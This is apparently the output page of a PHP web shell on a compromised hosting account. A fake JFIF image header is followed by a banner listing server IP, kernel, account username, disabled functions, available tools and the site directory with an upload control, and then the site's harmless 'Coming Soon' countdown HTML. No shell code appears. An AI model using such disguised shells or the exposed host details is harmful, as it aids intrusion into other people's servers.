���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/jksoftware.in/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Coming Soon</title> <style> /* General Styling */ body, html { height: 100%; margin: 0; font-family: 'Arial', sans-serif; color: #fff; overflow: hidden; } .bg-image { background-image: url('https://images.unsplash.com/photo-1506748686214-e9df14d4d9d0?q=80&w=1974&auto=format&fit=crop&ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D'); /* Placeholder Image */ height: 100%; background-position: center; background-repeat: no-repeat; background-size: cover; filter: blur(8px); -webkit-filter: blur(8px); transform: scale(1.1); } .container { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; background-color: rgba(0, 0, 0, 0.5); padding: 40px; border-radius: 10px; } h1 { font-size: 3em; margin-bottom: 10px; } h2 { font-size: 5em; margin-top: 0; text-transform: uppercase; letter-spacing: 5px; } /* Countdown Timer */ .countdown { display: flex; justify-content: center; margin-top: 30px; } .timer { display: flex; gap: 20px; } .timer div { text-align: center; } .timer span.value { font-size: 3em; font-weight: bold; } .timer span.label { display: block; font-size: 1em; text-transform: uppercase; } /* Responsive Design */ @media (max-width: 768px) { h1 { font-size: 2em; } h2 { font-size: 3em; } .timer span.value { font-size: 2em; } .timer span.label { font-size: 0.8em; } .container { padding: 20px; } } </style> </head> <body> <div class="bg-image"></div> <div class="container"> <h1>Our Website Is</h1> <h2>Coming Soon</h2> <div id="countdown" class="countdown"> <div class="timer"> <div> <span class="value" id="days"></span> <span class="label">Days</span> </div> <div> <span class="value" id="hours"></span> <span class="label">Hours</span> </div> <div> <span class="value" id="minutes"></span> <span class="label">Minutes</span> </div> <div> <span class="value" id="seconds"></span> <span class="label">Seconds</span> </div> </div> </div> </div> <script> // Set the date we're counting down to const countDownDate = new Date("Jun 20, 2025 23:59:59").getTime(); // Update the count down every 1 second const x = setInterval(function() { // Get today's date and time const now = new Date().getTime(); // Find the distance between now and the count down date const distance = countDownDate - now; // Time calculations for days, hours, minutes and seconds const days = Math.floor(distance / (1000 * 60 * 60 * 24)); const hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); const minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); const seconds = Math.floor((distance % (1000 * 60)) / 1000); // Display the result in the elements with id="days", "hours", "minutes", "seconds" document.getElementById("days").innerHTML = days < 10 ? "0" + days : days; document.getElementById("hours").innerHTML = hours < 10 ? "0" + hours : hours; document.getElementById("minutes").innerHTML = minutes < 10 ? "0" + minutes : minutes; document.getElementById("seconds").innerHTML = seconds < 10 ? "0" + seconds : seconds; // If the count down is finished, write some text if (distance < 0) { clearInterval(x); document.getElementById("countdown").innerHTML = "<h2>We Are Live!</h2>"; } }, 1000); </script> </body> </html>